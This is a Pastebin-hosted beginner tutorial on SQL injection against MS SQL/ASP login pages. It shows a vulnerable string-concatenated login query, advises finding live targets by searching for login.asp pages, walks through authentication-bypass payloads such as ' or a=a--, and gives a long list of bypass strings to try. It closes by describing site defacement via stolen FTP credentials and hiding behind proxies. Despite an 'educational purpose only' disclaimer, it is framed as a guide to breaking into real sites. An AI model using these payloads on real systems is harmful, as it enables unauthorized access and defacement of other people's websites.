Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Ok so before we start this tutorial, Its for Educational Purpose only and i m not responsible for what you do with this neither i will help you with any legal troubles you faces
- ---------------------------------------------------------------------------------
- SQL INJECTION Tutorial
- This is for people in Royalty who have a brief or absolutely no idea what SQLI is and have no idea how to find a
- vulnerable Tarket to exploit it through simple SQL injection .
- Section 1
- 1- DATABASES
- 2- SQL
- 3 - MS SQL
- 4 LOGIN
- Section 2
- 5 LOGIN.ASP /ADMIN/LOGIN.ASP
- 6 CHECKING THE SOURCE
- 7- NUMERIC PARAMETERS
- 8 - THE INJECTION
- 9- OTHER QUERY STRINGS
- 10 - WHAT TO DO
- 1- DATABASES
- This might looks boring for you all if so skip it, I dont Mind The first type of Database infacting a library. This is the best way
- to look at what exactly a database contains, a method that storing and retrieving data. A database consists of two fields:
- columns, which are referred to as 'fields' and rows, which are referred to as 'records'. Take an example:
- Name D.O.B User ID
- Annon 14/2/08 001
- Alex 11/7/09 002
- Sofia 12/09/07 003
- This is an simple example. I will not go too much into Databases and their workings for now more information regarding this can be found with google
- 2- SQL
- SQL is short for Structured Query Language and is a Language that is used to communicate with an SQL Database. SQL
- communicates with a relational database, the most commonly used database out there. SQL uses queries to get information
- from tables within the database. There are many commands that SQL uses, but we will not be going into the in the BEGINNERS
- part of the tutorial, the commands we will be focusing on is as follows:
- SELECT - This query is the basis of the SQ[language]. It will be the basis of the following queries, and will guide you
- to the right the table, and all corresponding fields and records
- FROM - This query selects the table name eg. 'table1' or 'password'
- WHERE - This allows you to specify specific conditions that are to be met
- The are the basics you would be using in this part of the tutorial. Now to put these commands in action.
- 3- MS SQL
- MS SQL is what we will be focusing on in this tutorial. MS SQL stands for Microsoft Structured Query Language. It is a
- cheap alternative to other SQL databases like Oracle. This means that there will be alot of targets out there, weather
- or not they are vulnerable is another thing, we will discuss that later in this tutorial. We will learn how to hack using
- out HTTP browser on port 80. In my advanced tutorial, we will also find out how to hack MS SQL on port 1434 (TCP)
- 4- LOGIN
- This is the basic for a login page that uses SQL (note that this is only an example, you will not find this in the page
- source 99% of the time)
- *NOTE* In SQL, * is a wildcard. It is a shortcut used to represent all values. Also not, None is not = to Null!
- " SELECT * FROM 'tablename' WHERE login='"&log&"' and password='"&pass&"' "
- Lets say that login= Th3_R@V3N and pass= haxxoRe
- SELECT * FROM table1 WHERE login=' Th3_R@V3N ' and pass=' haxxoRe '
- Using our SQL querys, we were able to Select the Login from 'table1' and the password was haxxoRe, thus our login would
- be successful.
- 5- LOGIN.ASP /ADMIN/LOGIN.ASP
- MS SQL uses logins via the form extenstion .ASP. Doing a search on google, you will find a hell of alot of targets.
- However not all of these are vulnerable. When you find a target, open it up, you should see a Username Field and a
- Password field (in most cases). Congradulations, you are now 1337, not, but you have taken the first, and most easiest
- step.
- 6- Checking the Source
- You should all know how to look at the source of the page, if not, right click in your browser and goto View Source.
- There is a number of things you would look at. A typical example of what a webmaster would use would be:
- Code:
- <@language="vbscript">
- <%
- dim conn,rs,log,pwd
- log=Request.form("login_name")
- pwd=Request.form("pass")
- set conn = Server.CreateObject("ADODB.Connection")
- conn.ConnectionString="provider=microsoft.jet.OLED B.4.0;data source=c:\database\tab1.mdb"
- conn.Open
- set rs = Server.CreateObject("ADODB.Recordset")
- rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
- If rs.EOF
- response.write("Login failed")
- else
- response.write("Login successful")
- End if
- %>
- This is a very basic code, but just gives you an insight into the kind of code that you should look out for. Also
- check anything between <FORM> and </FORM>, this will most likely give you the method of the query and sometimes you
- may get hidden values contained.
- 7- NUMERIC PARAMETERS
- I will not go too much into this, as it is just a beginners guide. However, it is important to note what numeric
- parameters are. We note that there are normally 3 different types of fields, these are:
- String
- Data
- Number
- The SQL query is passed to determine which type it is. For example
- LEET would obviously be a string. However 1337 would be a Number, although it must, also, be considered a string.
- The difference is that Strings and Dates have quotes around them, whereas Numbers do not.
- EXAMPLE
- SELECT * FROM table1 WHERE name= ‘LEET’
- SELECT * FROM table1 WHERE id= 7
- This should be remembered when doing advanced hacking of SQL when using the UNION clause. It should also be remember
- that when doing advanced hacking of SQL, strings would need to break out of the quotes, but that will be covered later.
- 8- THE INJECTION
- OK i know that the top stuff has been boring, stiff sh**. But now we get to the good stuff, the actuall injection.
- What an SQL injection is injecting Specially crafted Querys into the password and/or username field by the use of harmful
- characters. If the admin has not stripped these harmful characters, then it will be easier to get access into the system
- by simply fooling it into thinking its that you have the correct passwrod, when you dont. Take the example:
- ' or a=a--
- This may look simple. But, how can hackers use this to get access? Well let us take a previous example.
- " SELECT * FROM 'tablename' WHERE login='"&log&"' and password='"&pass&"' "
- Now let us say that use user Magic is an Admin on the site, and you wish to get access to his account, you would use
- the following injection (i have used 2 differnt query strings to shows 2 different examples of how access will be granted)
- User:Magic
- Password:' or a=a--
- Password: hey' or 'a'='a
- Now if you have a lazy admin, you will get access to the site in Magics account, why? Let us subsitute!
- SELECT * FROM table4 WHERE login='Magic' and pass='hi' or 'a'='a'
- *NOTE* that the login and password field always have 2 ' after them, eg. 'pass', it is important to note this for the
- follwing example, so you see why we use hi' or 'a'='a and not hi' or 'a'='a', there is a difference =)
- In this example, obviously the password is not 'hi' but on the other hand 'a' does = 'a', so the conditions are met =D
- SELECT * FROM table4 WHERE login='Magic' and pass='' or a=a-- '
- It is important to note, that -- will make the rest of the query not be checked
- In this example, we see that the pass does not equal nothing ('') but in the same case a does = a (remember that -- made
- the rest of the query not matter, therefore we do not worry about the ' character
- 9 OTHER QUERY STRINGS
- Here is a publicly made list of query strings, note that not all will work, so you may have to try a few before you get
- one that works, or simarly, you could make up your own
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- hi' or 'a'='a
- hi') or ('a'='a
- hi") or ("a"="a
- admin'--
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
- " or 0=0 #
- or 0=0 #
- ' or 'x'='x
- " or "x"="x
- ') or ('x'='x
- ' or 1=1--
- " or 1=1--
- or 1=1--
- ' or a=a--
- " or "a"="a
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- hi' or 'a'='a
- hi') or ('a'='a
- hi") or ("a"="a
- 10 - WHAT TO DO
- There are many things a hacker will do when inside, most likely, they will Fuc* the shit up, and most likely, they will
- be using a proxy WINK. They could then get into the FTP using your name and password and deface the site through the
- index.html file, but and they would more then likely keep a backup to save their ass some serious jail time.
- ---------------------------------------------------------------------
- Enjoy
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement